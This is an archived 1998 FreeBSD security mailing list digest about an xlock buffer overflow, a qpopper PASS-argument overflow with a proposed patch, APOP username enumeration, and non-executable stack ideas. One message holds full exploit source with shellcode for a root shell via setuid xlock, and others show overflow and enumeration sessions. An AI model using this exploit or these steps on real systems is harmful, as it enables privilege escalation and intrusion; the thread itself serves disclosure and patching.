> Alarmed by recent buffer overflow attacks on Linux machines in
> my vicinity (an exploit for this is available) I thought about
> xlock under FreeBSD and would like to know whether the
> security hole has been sorted out under FreeBSD 2.2.x or what
> measures are advised to prevent it.

Could you tell more about this?

tg

From owner-freebsd-security Mon Jun 29 00:20:23 1998
Message-ID: <19980629092005.33214@gil.physik.rwth-aachen.de>
Date: Mon, 29 Jun 1998 09:20:05 +0200
From: Christoph Kukulies
To: Thomas Gellekum
Cc: Christoph Kukulies, freebsd-security@FreeBSD.ORG
Subject: Re: xlock
References: <199806290632.IAA00836@gilberto.physik.RWTH-Aachen.DE> <87btrcy9s5.fsf@ghpc6.ihf.rwth-aachen.de>
In-Reply-To: <87btrcy9s5.fsf@ghpc6.ihf.rwth-aachen.de>; from Thomas Gellekum on Mon, Jun 29, 1998 at 08:58:02AM +0200

On Mon, Jun 29, 1998 at 08:58:02AM +0200, Thomas Gellekum wrote:
> Christoph Kukulies writes:
>
> > Alarmed by recent buffer overflow attacks on Linux machines in
> > my vicinity (an exploit for this is available) I thought about
> > xlock under FreeBSD and would like to know whether the
> > security hole has been sorted out under FreeBSD 2.2.x or what
> > measures are advised to prevent it.
>
> Could you tell more about this?
/* x86 XLOCK overflow exploit
   by cesaro@0wned.org 4/17/97

   Original exploit framework - lpr exploit

   Usage: make xlock-exploit
          xlock-exploit

   Assumptions: xlock is suid root, and installed in /usr/X11/bin
*/

[complete xploit can be sent on demand]

xlock, since it is suid root (I don't know which version is affected and
if that is fixed maybe in XF86332) can be fed with a command line
parameter causing a buffer overflow which allows a logged-in normal user
to gain a root shell. Actually the hole is a year old. Since I didn't
find xlock on freefall (hub) I thought the problem is known already.

The Linux exploit program doesn't work directly under FreeBSD (causes a
bad system call) but with some tweaking it could be made to work.

SUSE Linux 5.x fixes it the following way:

1.) establishing a group 'shadow' in /etc/group, sole member 'root':

    shadow:x:15:root

2.) xlock becomes SGID group shadow:

    -rwxr-sr-x   1 root     shadow     843596 Nov 16  1996 /usr/X11/bin/xlock*

3.) password files become group readable by group shadow

    -rw-r-----   1 root     shadow        289 Jan 16  1997 /etc/gshadow
    -rw-r-----   1 root     shadow        683 Jun 15 14:55 /etc/shadow
    -rw-r-----   1 root     shadow        683 May 14 18:09 /etc/shadow-
    -rw-r-----   1 root     shadow        642 Sep 30  1997 /etc/shadow.orig

>
> tg

--
--Chris Christoph P. U.
Kukulies kuku@gil.physik.rwth-aachen.de To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 29 00:30:01 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA23119 for freebsd-security-outgoing; Mon, 29 Jun 1998 00:30:01 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ghpc8.ihf.rwth-aachen.de (ghpc8.ihf.RWTH-Aachen.DE [134.130.90.8]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA23084 for ; Mon, 29 Jun 1998 00:29:55 -0700 (PDT) (envelope-from tg@ghpc8.ihf.rwth-aachen.de) Received: from ghpc6.ihf.rwth-aachen.de (ghpc6.ihf.rwth-aachen.de [134.130.90.6]) by ghpc8.ihf.rwth-aachen.de (8.8.8/8.8.6) with ESMTP id JAA25546; Mon, 29 Jun 1998 09:29:49 +0200 (CEST) Received: (from tg@localhost) by ghpc6.ihf.rwth-aachen.de (8.8.8/8.8.5) id JAA04551; Mon, 29 Jun 1998 09:29:47 +0200 (CEST) To: Christoph Kukulies Cc: freebsd-security@FreeBSD.ORG Subject: Re: xlock References: <199806290632.IAA00836@gilberto.physik.RWTH-Aachen.DE> <87btrcy9s5.fsf@ghpc6.ihf.rwth-aachen.de> <19980629092005.33214@gil.physik.rwth-aachen.de> From: Thomas Gellekum Date: 29 Jun 1998 09:29:47 +0200 In-Reply-To: Christoph Kukulies's message of "Mon, 29 Jun 1998 09:20:05 +0200" Message-ID: <8790mgy8b8.fsf@ghpc6.ihf.rwth-aachen.de> Lines: 31 X-Mailer: Gnus v5.5/XEmacs 20.4 - "Emerald" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Christoph Kukulies writes: > On Mon, Jun 29, 1998 at 08:58:02AM +0200, Thomas Gellekum wrote: > > Christoph Kukulies writes: > > > > > Alarmed by recent buffer overflow attacks on Linux machines in > > > my vicinity (an exploit for this is available) I thought about > > > xlock under FreeBSD and would like to know whether the > > > security hole has been sorted out under FreeBSD 2.2.x or what > > > measures are advised to prevent it. > > > > Could you tell more about this? 
> > /* x86 XLOCK overflow exploit > by cesaro@0wned.org 4/17/97 > > Original exploit framework - lpr exploit > > Usage: make xlock-exploit > xlock-exploit > > Assumptions: xlock is suid root, and installed in /usr/X11/bin > */ > > [complete xploit can be sent on demand] Please do. Desmond Bagley, the maintainer of xlockmore mentioned a security hole in Mesa with suid binaries. I don't know if it's the same problem. tg To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 29 01:02:18 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA26087 for freebsd-security-outgoing; Mon, 29 Jun 1998 01:02:18 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from infowest.com (infowest.com [204.17.177.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA26082 for ; Mon, 29 Jun 1998 01:02:13 -0700 (PDT) (envelope-from agifford@infowest.com) Received: from infowest.com (liberty.infowest.com [207.49.60.254]) by infowest.com (8.8.8/8.8.8) with ESMTP id CAA06195; Mon, 29 Jun 1998 02:01:11 -0600 (MDT) Message-ID: <359749BB.8A412952@infowest.com> Date: Mon, 29 Jun 1998 02:00:59 -0600 From: "Aaron D. Gifford" X-Mailer: Mozilla 4.05 [en] (X11; U; FreeBSD 2.2.6-STABLE i386) MIME-Version: 1.0 To: bugtraq@netspace.org CC: John Fraizer , security@FreeBSD.ORG Subject: Re: More problems with QPOPPER - References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org John Fraizer wrote: > > After applying all the patches with exception of the PAM patch in the > .RPM'd version of qpopper2.4.src, > I have located yet another hole in qpopper. > > This popper was compiled with -DAUTH in the makefile. > > Connecting to the popper and sending a line of garbage will now generate > the maximum permitted size > error. 
Providing an INVALID username and sending a line of garbage (1000+ > chars), does not segfault. I > was beginning to relax. > > [OverKill]:/$ telnet localhost pop3 > Trying 127.0.0.1... > Connected to localhost. > Escape character is '^]'. > +OK QPOP (version 2.4) at Victim.Com starting. > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > -ERR Command "xxxxxxxxxxxxxxxxx" (truncated) exceedes maximum permitted > size. > user blah > +OK Password required for blah. 
> pass > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > > -ERR Password supplied for "blah" is incorrect. > +OK Pop server at Victim.Com signing off. > Connection closed by foreign host. > > I decided to try a long username: > > [OverKill]:/$ telnet localhost pop3 > Trying 127.0.0.1... > Connected to localhost. > Escape character is '^]'. > +OK QPOP (version 2.4) at Victim.Com starting. 
> user > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > -ERR Argument 1 "xxxxxxxxxxxxxxxxx" (truncated) exceeds maximum permitted > size. > > Handled it just fine. > > Then, I decided to try a VALID username: > > [OverKill]:/$ telnet localhost pop3 > Trying 127.0.0.1... > Connected to localhost. > Escape character is '^]'. > +OK QPOP (version 2.4) at Victim.Com starting. > user valid > +OK Password required for valid. 
> pass > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > Connection closed by foreign host. > > It segfaulted and dumped core. > > Damnit, Jim, I'm a Doctor not a C programmer! I have managed to locate > the portion of the code that is bypassing the " -ERR Command > "xxxxxxxxxxxxxxxxx" (truncated) exceedes maximum permitted size. " code > from the installed patches: > > In pop_parse.c, we find: > > /* > * This is kinda gross. Passwords have to be parsed diffrently > * as they may contain spaces. If you think of a cleaner way, > * do it. The "p->pop_command[0] == 'p'" is so save a call to > * strcmp() on ever call to pop_parse(); This parsing keeps > * leading and trailing speces behind for the password command. 
>  */
>         if(p->pop_command[0] == 'p' && strcmp(p->pop_command,"pass") == 0) {
>             if (*mp != 0) {
>                 p->pop_parm[1] = mp;
>                 if (strlen(mp) > 0) {
>                     mp = mp + strlen(mp) - 1;
>                     while (*mp == 0xa || *mp == 0xd) *mp-- = 0;
>                 }
>
> Looks like basically that if the parser sees that the command was actually
> a password argument, it doesn't send it through the truncate code.

Looks like qpopper after the "if(p->pop_command..." bit assumes everything
else in the buffer is the password except any trailing CR/LF characters,
which it removes.

I cannot understand the "if (strlen(mp) > 0) {" test, because the previous
"if (*mp != 0) {" test should guarantee that strlen() will always at least
return 1.

For those who want to be consistent about limiting argument length using
MAXPARMLEN, you can try this snippet instead of the above existing snippet
in pop_parse.c:

        if(p->pop_command[0] == 'p' && strcmp(p->pop_command,"pass") == 0) {
            if (*mp != 0) {
                if (strlen(mp) > MAXPARMLEN) {
                    mp[MAXPARMLEN] = '\0';
                    pop_msg(p,POP_FAILURE,
                        "Argument %d \"%s\" (truncated) exceeds maximum permitted size.",
                        i+1, mp);
                    return(-1);
                }
                p->pop_parm[1] = mp;
                mp = mp + strlen(mp) - 1;
                while (*mp == 0xa || *mp == 0xd) *mp-- = 0;
                return(1);
            } else
                return (-1);
        }

PLEASE be aware that you need a large enough MAXPARMLEN defined in
popper.h to handle large passwords or APOP depending on your individual
needs. I've been using 32 on my system, which should permit APOP to work.

Another fun qpopper trivia fact for the security conscious:

While looking at the APOP stuff, I see that it is possible to glean valid
user names from sites using certain configurations of qpopper with APOP
support. For example:

localhost# telnet localhost 110
+OK QPOP (version 2.41beta1) at localhost starting.  <18115.899106609@localhost>
APOP bogus-user 1638de71888f8c3ff023ac5c38621211
-ERR Password supplied for "bogus" is incorrect.
+OK Pop server at localhost signing off.
Connection closed by foreign host.
localhost# telnet localhost 110
+OK QPOP (version 2.41beta1) at localhost starting.  <18119.899106628@localhost>
APOP real-user 8463af56e9a5d72cc84012ad7748f92c
-ERR not authorized
+OK Pop server at localhost signing off.
Connection closed by foreign host.
localhost#

Nice. In some cases where APOP support is compiled in but the APOP
database does not exist, the error message on a valid user might be
"-ERR POP authorization DB not available (real-user)" instead of the
"-ERR not authorized" message. I don't know if this would work for sites
with properly configured APOP or not. It worked on my own machine which
does NOT use APOP but had APOP compiled in by default.

Aaron out.

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message

From owner-freebsd-security Mon Jun 29 01:34:55 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA03458 for freebsd-security-outgoing; Mon, 29 Jun 1998 01:34:55 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from gilberto.physik.RWTH-Aachen.DE (gilberto.physik.rwth-aachen.de [137.226.30.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA03452 for ; Mon, 29 Jun 1998 01:34:50 -0700 (PDT) (envelope-from kuku@gilberto.physik.RWTH-Aachen.DE)
Received: (from kuku@localhost) by gilberto.physik.RWTH-Aachen.DE (8.8.8/8.8.7) id KAA01164; Mon, 29 Jun 1998 10:17:18 +0200 (MEST) (envelope-from kuku)
Message-ID: <19980629101718.52752@gil.physik.rwth-aachen.de>
Date: Mon, 29 Jun 1998 10:17:18 +0200
From: Christoph Kukulies
To: Thomas Gellekum
Cc: Christoph Kukulies , freebsd-security@FreeBSD.ORG
Subject: Re: xlock
References: <199806290632.IAA00836@gilberto.physik.RWTH-Aachen.DE> <87btrcy9s5.fsf@ghpc6.ihf.rwth-aachen.de> <19980629092005.33214@gil.physik.rwth-aachen.de> <8790mgy8b8.fsf@ghpc6.ihf.rwth-aachen.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.81e
In-Reply-To:
<8790mgy8b8.fsf@ghpc6.ihf.rwth-aachen.de>; from Thomas Gellekum on Mon, Jun 29, 1998 at 09:29:47AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Jun 29, 1998 at 09:29:47AM +0200, Thomas Gellekum wrote: > Christoph Kukulies writes: > > > On Mon, Jun 29, 1998 at 08:58:02AM +0200, Thomas Gellekum wrote: > > > Christoph Kukulies writes: > > > > > > > Alarmed by recent buffer overflow attacks on Linux machines in > > > > my vicinity (an exploit for this is available) I thought about > > > > xlock under FreeBSD and would like to know whether the > > > > security hole has been sorted out under FreeBSD 2.2.x or what > > > > measures are advised to prevent it. > > > > > > Could you tell more about this? > > > > /* x86 XLOCK overflow exploit > > by cesaro@0wned.org 4/17/97 > > > > Original exploit framework - lpr exploit > > > > Usage: make xlock-exploit > > xlock-exploit > > > > Assumptions: xlock is suid root, and installed in /usr/X11/bin > > */ > > > > [complete xploit can be sent on demand] OK, here goes: (This is for Linux 2.x, xlock path and code on stack may vary for FreeBSD if applicable). 
--8<----------------------------------------------------------------------
/* x86 XLOCK overflow exploit
   by cesaro@0wned.org 4/17/97

   Original exploit framework - lpr exploit

   Usage: make xlock-exploit
          xlock-exploit

   Assumptions: xlock is suid root, and installed in /usr/X11/bin
*/

/* The header names were lost in the archive; these are the ones the
   code below actually uses. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 996

/* Returns the caller's stack pointer: the asm leaves %esp in %eax,
   which is where the i386 ABI expects the return value. */
long get_esp(void)
{
    __asm__("movl %esp,%eax\n");
}

int main(int argc, char *argv[])
{
    char *buff = NULL;
    unsigned long *addr_ptr = NULL;
    char *ptr = NULL;
    int dfltOFFSET = DEFAULT_OFFSET;
    /* Linux/x86 execve("/bin/sh") shellcode followed by exit() */
    u_char execshell[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
        "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
        "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
        "\xd7\xff\xff\xff/bin/sh";
    int i;

    if (argc > 1)
        dfltOFFSET = atoi(argv[1]);
    else
        printf("You can specify another offset as a parameter if you need...\n");

    buff = malloc(4096);
    if (!buff) {
        printf("can't allocate memory\n");
        exit(0);
    }

    /* NOP sled, then the shellcode, then two copies of the guessed
       return address (current stack pointer plus offset). */
    ptr = buff;
    memset(ptr, 0x90, BUFFER_SIZE - strlen(execshell));
    ptr += BUFFER_SIZE - strlen(execshell);
    for (i = 0; i < strlen(execshell); i++)
        *(ptr++) = execshell[i];
    addr_ptr = (long *)ptr;
    for (i = 0; i < 2; i++)
        *(addr_ptr++) = get_esp() + dfltOFFSET;
    ptr = (char *)addr_ptr;
    *ptr = 0;

    /* The overlong -name argument is what overflows xlock's buffer. */
    execl("/usr/X11/bin/xlock", "xlock", "-nolock", "-name", buff, NULL);
}
--8<----------------------------------------------------------------------

>
> Please do. Desmond Bagley, the maintainer of xlockmore mentioned a
> security hole in Mesa with suid binaries. I don't know if it's the
> same problem.
>
> tg

--
Chris Christoph P. U.
Kukulies kuku@gil.physik.rwth-aachen.de To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 29 02:01:08 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA06209 for freebsd-security-outgoing; Mon, 29 Jun 1998 02:01:08 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from monitor.voronezh.su (dialup33.vrn.ru [195.98.64.191]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id CAA06183 for ; Mon, 29 Jun 1998 02:01:00 -0700 (PDT) (envelope-from BAZILIO@monitor.voronezh.su) Message-Id: <199806290901.CAA06183@hub.freebsd.org> Received: from bazilio [192.168.100.21] by monitor.voronezh.su [127.0.0.1] with SMTP (MDaemon.v2.7.SP0.R) for ; Mon, 29 Jun 98 12:17:15 +0400 From: "bazilio" To: CC: Subject: Re: non-executable stack? Date: Mon, 29 Jun 1998 12:15:07 +0400 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1161 MIME-Version: 1.0 Content-Type: text/plain; charset=KOI8-R Content-Transfer-Encoding: 7bit X-MDaemon-Deliver-To: freebsd-security@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 28 Jun 1998 17:26:30 +1200 (NZST) you wrote: >> You misunderstand. My proposal, seemingly seconded by jtb, was to >> allow the administrator to disallow the presence of non-printable ascii >> characters in the environment or command line arguments at the time of >> execve of certain processes. We still don't know if this will have any >> effect on security though, since no-one has checked to see if its possible >> to write shellcode using just printable ASCII. It would certainly >> make life difficult for the attacker, since it would be impossible to >> overwrite the saved eip with an address on the stack since the stack >> is at the top of the address space around 0xFFxxxxxx or 0xEFxxxxxx. 
>> >> Niall >I know next to nothing about assembly level programming, but if you mean >that there is a problem because 0xFF and 0xEF are out of bounds, then I >figure this means very little if the attacker has access to a small range >of arithmetic or bitwise operators to generate these characters. With a >little more effort, byte values could perhaps be borrowed from elsewhere, >copying them from addressable locations. It's true, but I think addition of this checking will force attackers to make much more efforts. Arith and bitwise instructions can make anymore, but an exploiting code must contain instructions to obtain current %eip value, which is very hard without some opcodes. Also I think that we must add sanity check not for printable characters, but for arch-specific exploit dangerous magic numbers and its sequences. >Andrew McNaughton Thanks, Vasily. I prefer to use FreeBSD at all. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 29 05:25:34 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA05342 for freebsd-security-outgoing; Mon, 29 Jun 1998 05:25:34 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from brooklyn.slack.net (brooklyn.slack.net [206.41.21.102]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA05335 for ; Mon, 29 Jun 1998 05:25:26 -0700 (PDT) (envelope-from andrewr@brooklyn.slack.net) Received: from localhost (andrewr@localhost) by brooklyn.slack.net (8.8.7/8.8.7) with SMTP id IAA23332; Mon, 29 Jun 1998 08:27:49 -0400 (EDT) Date: Mon, 29 Jun 1998 08:27:49 -0400 (EDT) From: andrewr To: Christoph Kukulies cc: freebsd-security@FreeBSD.ORG Subject: Re: xlock In-Reply-To: <199806290632.IAA00836@gilberto.physik.RWTH-Aachen.DE> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The main 
problem with using xlock is that the people who have made it and mod'd it over the years, have tried to make it more of a program than it should be. ie, giving the user more options than are needed for this type of program. All xlock needs to be is a simple mechanism for locking X, nothing else. Also, I am porting a console locking program (doesn't allow VT switching), from linux, but I have been having trouble with the actual stopping of the allowing of VT switching. I have tried setting vtmode to be handled by the process, then using an ioctl to execute this. This failed. Then, I tried using flock(), that failed. If you have any ideas and would like to know what I did before (dealing with flock() and ioctl(), just ask). A. ***************************************** AWR XNS, Inc. "Drink beer, it will save your life." On Mon, 29 Jun 1998, Christoph Kukulies wrote: > > Alarmed by recent buffer overflow attacks on Linux machines in > my vicinity (an exploit for this is available) I thought about > xlock under FreeBSD and would like to know whether the > security hole has been sorted out under FreeBSD 2.2.x or what > measures are advised to prevent it. > > -- > Chris Christoph P. U. 
